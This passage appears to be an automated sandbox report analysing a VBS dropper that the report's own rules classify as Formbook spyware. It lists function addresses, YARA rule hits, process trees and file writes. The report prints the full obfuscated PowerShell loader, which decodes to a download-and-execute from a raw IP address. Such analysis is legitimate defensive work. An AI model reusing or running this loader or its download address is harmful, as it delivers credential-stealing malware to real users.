        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_0114A8AE10_2_0114A8AE
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_0114AA0110_2_0114AA01
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_01152DC410_2_01152DC4
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_01152DC810_2_01152DC8
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_011695E810_2_011695E8
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_0114C61810_2_0114C618
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_0115164810_2_01151648
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_056A375F10_2_056A375F
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_0568CF3B10_2_0568CF3B
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_0568CF3F10_2_0568CF3F
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_0568678F10_2_0568678F
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_056869AF10_2_056869AF
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_05684B7810_2_05684B78
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_05684A2F10_2_05684A2F
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_05684A2510_2_05684A25
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D7E4F611_2_04D7E4F6
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D8244611_2_04D82446
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CC146011_2_04CC1460
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D8F43F11_2_04D8F43F
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D9059111_2_04D90591
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D6D5B011_2_04D6D5B0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D8757111_2_04D87571
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CD053511_2_04CD0535
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D816CC11_2_04D816CC
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CEC6E011_2_04CEC6E0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CCC7C011_2_04CCC7C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D8F7B011_2_04D8F7B0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CF475011_2_04CF4750
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CD077011_2_04CD0770
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CD70C011_2_04CD70C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D7F0CC11_2_04D7F0CC
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D870E911_2_04D870E9
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D8F0E011_2_04D8F0E0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D881CC11_2_04D881CC
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D901AA11_2_04D901AA
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CDB1B011_2_04CDB1B0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D5815811_2_04D58158
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D9B16B11_2_04D9B16B
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CBF17211_2_04CBF172
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D0516C11_2_04D0516C
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CC010011_2_04CC0100
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D6A11811_2_04D6A118
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CEB2C011_2_04CEB2C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D712ED11_2_04D712ED
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CD52A011_2_04CD52A0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D7027411_2_04D70274
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CDE3F011_2_04CDE3F0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D903E611_2_04D903E6
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D1739A11_2_04D1739A
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CBD34C11_2_04CBD34C
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D8A35211_2_04D8A352
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D8132D11_2_04D8132D
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D8FCF211_2_04D8FCF2
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CC0CF211_2_04CC0CF2
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D70CB511_2_04D70CB5
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CD0C0011_2_04CD0C00
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D49C3211_2_04D49C32
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CEFDC011_2_04CEFDC0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CCADE011_2_04CCADE0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CE8DBF11_2_04CE8DBF
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D81D5A11_2_04D81D5A
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CD3D4011_2_04CD3D40
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D87D7311_2_04D87D73
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CDAD0011_2_04CDAD00
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D8EEDB11_2_04D8EEDB
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D8CE9311_2_04D8CE93
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CE2E9011_2_04CE2E90
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CD9EB011_2_04CD9EB0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CD0E5911_2_04CD0E59
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D8EE2611_2_04D8EE26
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CC2FC811_2_04CC2FC8
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CDCFE011_2_04CDCFE0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CD1F9211_2_04CD1F92
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D8FFB111_2_04D8FFB1
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D44F4011_2_04D44F40
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D8FF0911_2_04D8FF09
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D12F2811_2_04D12F28
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CF0F3011_2_04CF0F30
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CD38E011_2_04CD38E0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CFE8F011_2_04CFE8F0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CB68B811_2_04CB68B8
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CD284011_2_04CD2840
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CDA84011_2_04CDA840
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D3D80011_2_04D3D800
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CD29A011_2_04CD29A0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D9A9A611_2_04D9A9A6
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CD995011_2_04CD9950
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CEB95011_2_04CEB950
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CE696211_2_04CE6962
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D7DAC611_2_04D7DAC6
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CCEA8011_2_04CCEA80
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D15AA011_2_04D15AA0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D6DAAC11_2_04D6DAAC
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D8FA4911_2_04D8FA49
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D87A4611_2_04D87A46
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D43A6C11_2_04D43A6C
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D86BD711_2_04D86BD7
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D45BF011_2_04D45BF0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D0DBF911_2_04D0DBF9
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04CEFB8011_2_04CEFB80
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D8AB4011_2_04D8AB40
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D8FB7611_2_04D8FB76
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_02CE307011_2_02CE3070
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_02CDC2D611_2_02CDC2D6
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_02CDC2E011_2_02CDC2E0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_02CDE26011_2_02CDE260
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_02CDE04011_2_02CDE040
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_02CFB01011_2_02CFB010
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_02CE47EC11_2_02CE47EC
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_02CE47F011_2_02CE47F0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_02CDC42911_2_02CDC429
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 04CBB970 appears 268 times
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 04D05130 appears 36 times
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 04D17E54 appears 96 times
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 04D4F290 appears 105 times
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 04D3EA12 appears 86 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 2277EA12 appears 82 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 22745130 appears 36 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 2278F290 appears 103 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 226FB970 appears 268 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 22757E54 appears 96 times
        Source: FTG_PD_04024024001.vbsInitial sample: Strings found which are bigger than 50
        Source: amsi64_4268.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: amsi32_5328.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000B.00000002.3309988573.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000008.00000002.2821245767.0000000025220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000008.00000002.2802296347.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000B.00000002.3309922219.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: powershell.exe PID: 4268, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 5328, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@19/10@4/3
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Argean.MenJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2684:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qitgwwi2.d5m.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FTG_PD_04024024001.vbs"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4268
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5328
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FTG_PD_04024024001.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Argean.Men && echo $"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker 